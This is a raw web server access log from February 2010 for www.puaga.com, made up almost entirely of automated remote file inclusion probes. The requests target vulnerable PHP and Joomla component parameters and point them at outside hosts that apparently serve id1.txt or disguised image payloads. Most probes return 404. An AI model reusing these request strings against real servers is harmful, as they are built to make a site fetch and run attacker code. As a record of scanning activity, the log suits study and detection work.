122.252.1.109 - - [14/Feb/2010:05:57:17 -0800] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [14/Feb/2010:05:57:21 -0800] "GET /logs//includes/header.php?c_temp_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [14/Feb/2010:05:57:21 -0800] "GET /includes/header.php?c_temp_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [14/Feb/2010:05:57:21 -0800] "GET /logs/access.log%20%20//includes/header.php?c_temp_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [14/Feb/2010:05:57:38 -0800] "GET /logs/access_100124.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [14/Feb/2010:05:57:38 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [14/Feb/2010:05:57:38 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:57:39 -0800] "GET /logs/access.log%20%20/index.php?sayfa=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:57:39 -0800] "GET /logs/index.php?sayfa=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:57:39 -0800] "GET /index.php?sayfa=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:05:57:42 -0800] "GET /logs/access_100130.log//theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:05:57:42 -0800] "GET /theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:05:57:42 -0800] "GET /logs//theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [14/Feb/2010:05:57:48 -0800] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [14/Feb/2010:05:57:48 -0800] "GET /logs/access_100117.log%20%20/index.php?sayfa=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:05:57:49 -0800] "GET /theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:05:57:49 -0800] "GET /logs/access_100130.log//theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:05:57:49 -0800] "GET /logs//theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:05:58:07 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:05:58:07 -0800] "GET /logs/access_100112.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:05:58:07 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:05:58:22 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [14/Feb/2010:05:58:33 -0800] "GET /logs/access_100210.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [14/Feb/2010:05:58:45 -0800] "GET /logs/access_100128.log%20%20//includes/header.php?c_temp_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [14/Feb/2010:05:59:30 -0800] "GET /logs/access_100127.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:06:00:24 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:06:00:24 -0800] "GET /logs/access_100112.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:06:00:24 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:06:00:39 -0800] "GET /logs/access_100123.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [14/Feb/2010:06:02:05 -0800] "GET /logs/access_100128.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:06:02:49 -0800] "GET /logs/access_100202.log//write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:06:02:49 -0800] "GET /write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:06:02:49 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [14/Feb/2010:06:03:09 -0800] "GET /logs/access_100203.log//write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:06:03:16 -0800] "GET /theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:06:03:16 -0800] "GET /logs//theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:06:03:16 -0800] "GET /logs/access_100130.log%20%20//theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:06:03:33 -0800] "GET /theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:06:03:33 -0800] "GET /logs/access_100130.log%20%20//theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:06:03:33 -0800] "GET /logs//theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:06:04:10 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:06:04:10 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:06:04:10 -0800] "GET /logs/access_100112.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [14/Feb/2010:06:04:10 -0800] "GET /logs/access_100123.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:06:04:41 -0800] "GET /logs/access_100124.log%20%20//theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:06:04:50 -0800] "GET /logs/access_100124.log%20%20//theme.php?THEME_DIR=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:06:04:57 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:06:04:57 -0800] "GET /logs/access_100208.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:06:04:57 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:06:04:58 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:06:04:58 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:06:04:58 -0800] "GET /logs/access_100208.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:06:05:09 -0800] "GET /logs/access_100109.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.124.149.168 - - [14/Feb/2010:06:05:10 -0800] "GET /logs/access_100109.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:06:05:47 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:06:05:47 -0800] "GET /logs/access_100115.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:06:05:47 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:06:05:59 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:06:05:59 -0800] "GET /logs/access_100116.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:06:05:59 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:06:06:05 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:06:06:05 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:06:06:05 -0800] "GET /logs/access_100116.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:06:06:54 -0800] "GET /logs/access_100208.log//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:06:07:07 -0800] "GET /logs/access_100109.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:06:07:14 -0800] "GET /logs/access_100109.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:07:17 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:07:17 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:07:18 -0800] "GET /logs/access_100115.log//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:07:18 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:07:18 -0800] "GET /logs/access_100115.log//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:07:18 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [14/Feb/2010:06:07:25 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [14/Feb/2010:06:07:25 -0800] "GET /logs/access_100115.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [14/Feb/2010:06:07:25 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:07:28 -0800] "GET /errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:07:28 -0800] "GET /logs//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:07:29 -0800] "GET /logs/access_100115.log//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:06:07:33 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:06:07:34 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:06:07:34 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:06:07:34 -0800] "GET /logs/access_100116.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:06:07:37 -0800] "GET /logs/access_100115.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:06:07:37 -0800] "GET /errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:06:07:37 -0800] "GET /logs//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:06:07:38 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:06:07:38 -0800] "GET /logs/access_100116.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [14/Feb/2010:06:07:38 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:07:38 -0800] "GET /logs/access_100115.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:07:38 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:07:38 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:06:07:54 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:06:07:55 -0800] "GET /logs/access_100115.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.235.132 - - [14/Feb/2010:06:07:55 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:07:57 -0800] "GET /logs/access_100208.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:08:30 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:08:30 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:08:31 -0800] "GET /logs/access_100115.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:06:08:32 -0800] "GET /ammember///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:06:08:32 -0800] "GET /logs/access_100129.log//ammember///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:06:08:32 -0800] "GET /logs//ammember///////////////////?_SERVER[DOCUMENT_ROOT]=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [14/Feb/2010:06:08:42 -0800] "GET /logs/access_100208.log%20%20//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:08:44 -0800] "GET /logs/access_100115.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:06:08:47 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [14/Feb/2010:06:09:09 -0800] "GET /logs/access_100208.log%20%20//errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:06:09:53 -0800] "GET /logs/access_100123.log//include.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:06:09:53 -0800] "GET /logs//include.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:06:09:57 -0800] "GET /include.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:10:02 -0800] "GET /logs/access_100202.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:10:02 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:10:02 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:10:03 -0800] "GET /logs/access_100202.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:10:03 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:10:04 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:06:10:04 -0800] "GET /logs/access_100123.log//include.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:06:10:04 -0800] "GET /logs//include.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:06:10:04 -0800] "GET /include.php?path[docroot]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:10:05 -0800] "GET /logs/access_100208.log//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [14/Feb/2010:06:10:05 -0800] "GET /logs/access_100112.log/index2.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:10:05 -0800] "GET /logs/access_100208.log//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.226.134.29 - - [14/Feb/2010:06:10:10 -0800] "GET /logs/access_100208.log//errors.php?error=http://millo.niztyc.net/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [14/Feb/2010:06:10:13 -0800] "GET /logs/access_100202.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
